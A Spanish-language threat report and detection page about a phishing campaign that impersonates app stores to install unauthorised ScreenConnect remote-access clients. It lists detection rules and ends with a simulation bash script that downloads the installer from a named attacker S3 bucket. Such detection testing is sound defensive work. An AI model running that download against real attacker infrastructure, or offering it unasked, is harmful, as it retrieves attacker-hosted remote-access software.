Propagación de ScreenConnect a Gran Escala a Través de Phishing con Temática de App Store
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Una campaña de phishing a gran escala está utilizando técnicas avanzadas de ingeniería social para desplegar clientes de ConnectWise ScreenConnect no autorizados. Los atacantes se hacen pasar por servicios de confianza como Microsoft Store, Apple App Store y Google Meet a través de contenido web dinámico y mensajes de actualización fraudulentos. Una vez instalado, el software RMM proporciona a los actores de amenazas acceso remoto persistente a los sistemas comprometidos.
Investigación
El equipo de LevelBlue OpsCTI descubrió la campaña mediante el análisis de un marco de phishing de actualizaciones falsas y una infraestructura reutilizada. Los investigadores identificaron estructuras de directorios consistentes, hashes de recursos HTTP recurrentes y scripts asistidos por IA utilizados para perfilar a posibles víctimas. La investigación también reveló el abuso de las APIs de Telegram Bot para telemetría en tiempo real e informes de infecciones.
Mitigación
Las organizaciones deben priorizar la detección de software RMM no autorizado y monitorear las descargas ejecutables de servicios de nube pública desconocidos como Amazon S3 o Cloudflare R2. También se recomiendan controles para identificar la suplantación de marcas y el tráfico no autorizado de la API de Telegram Bot. Las revisiones regulares de inventario de endpoints pueden ayudar a descubrir instalaciones deshonestas de ScreenConnect y compromisos existentes.
Respuesta
Si se sospecha de un compromiso, los sistemas afectados deben ser aislados de inmediato y cualquier cliente de ScreenConnect que comunique con instancias de retransmisión no autorizadas debe ser investigado. Se deben revisar los registros de red en busca de conexiones sospechosas a dominios conocidos de phishing o puntos finales de almacenamiento en la nube pública. Los respondedores también deberían examinar los procesos lanzados por msiexec.exe o PowerShell que descargan archivos de fuentes externas.
Flujo de Ataque
Detecciones
La posibilidad de ejecución a través de líneas de comando de PowerShell ocultas (vía cmdline)
Proof of Value
Llamar a métodos .NET sospechosos desde Powershell (vía powershell)
Proof of Value
Posible ejecución de archivos Msiexec en un directorio inusual (vía cmdline)
Proof of Value
Software alternativo de acceso remoto / gestión (vía process_creation)
Proof of Value
Posible abuso de dominio de desarrollo de Cloudflare (vía dns)
Proof of Value
Comando y control sospechoso mediante solicitud DNS de un dominio de nivel superior inusual (TLD) (vía dns)
Proof of Value
IOCs (HashSha256) para detectar: Más allá de ‘Actualizaciones Falsas’: De Phishing Temático de Tiendas de Aplicaciones a Distribución a Gran Escala de ScreenConnect
Proof of Value
IOCs (SourceIP) para detectar: Más allá de ‘Actualizaciones Falsas’: De Phishing Temático de Tiendas de Aplicaciones a Distribución a Gran Escala de ScreenConnect
Proof of Value
IOCs (DestinationIP) para detectar: Más allá de ‘Actualizaciones Falsas’: De Phishing Temático de Tiendas de Aplicaciones a Distribución a Gran Escala de ScreenConnect
Proof of Value
Ejecución de instalación no autorizada de ScreenConnect vía phishing [Creación de Procesos de Windows]
Proof of Value
Detectar descarga del instalador de ScreenConnect desde buckets S3 sospechosos [AWS Cloudtrail]
Proof of Value
Ejecución de Simulación
Prerrequisito: La Verificación Previa de Telemetría y Línea Base debe haber pasado.
Racional: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Los ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa del Ataque y Comandos: Un atacante ha establecido una campaña de phishing. Para evitar la detección por antivirus basados en archivos, alojan una herramienta legítima de acceso remoto (ScreenConnect) en un bucket AWS S3 público que imita la distribución legítima de software. El atacante instruye a una víctima para descargar el instalador. Esta acción activa un
GetObjectevento en AWS CloudTrail, apuntando al bucket malicioso específicoeobtdk.s3.us-east-2.amazonaws.comy al nombre de archivo específicoScreenConnect.ClientSetup.msi. -
Guión de Prueba de Regresión: [Note: Since we cannot interact with real malicious buckets, this script simulates the solicitud que generaría la entrada del registro si el bucket existiera.]
#!/bin/bash # Script de simulación para activar la regla de detección de CloudTrail # Esto imita la llamada a la API que haría un adversario para descargar la herramienta echo "[+] Iniciando Simulación: Descargando ScreenConnect desde Malicious S3..." # Usamos el CLI de AWS para intentar una solicitud GET. # Incluso si el bucket no existe, el intento de 'solicitud' genera el evento de CloudTrail # en un entorno real donde el bucket está configurado. aws s3 cp s3://eobtdk/ScreenConnect.ClientSetup.msi . --region us-east-2 echo "[+] Comando de simulación enviado. Verifique CloudTrail para eventos GetObject apuntando a 'eobtdk.s3.us-east-2.amazonaws.com'." -
Comandos de Limpieza:
# Eliminar cualquier archivo descargado durante la simulación rm -f ScreenConnect.ClientSetup.msi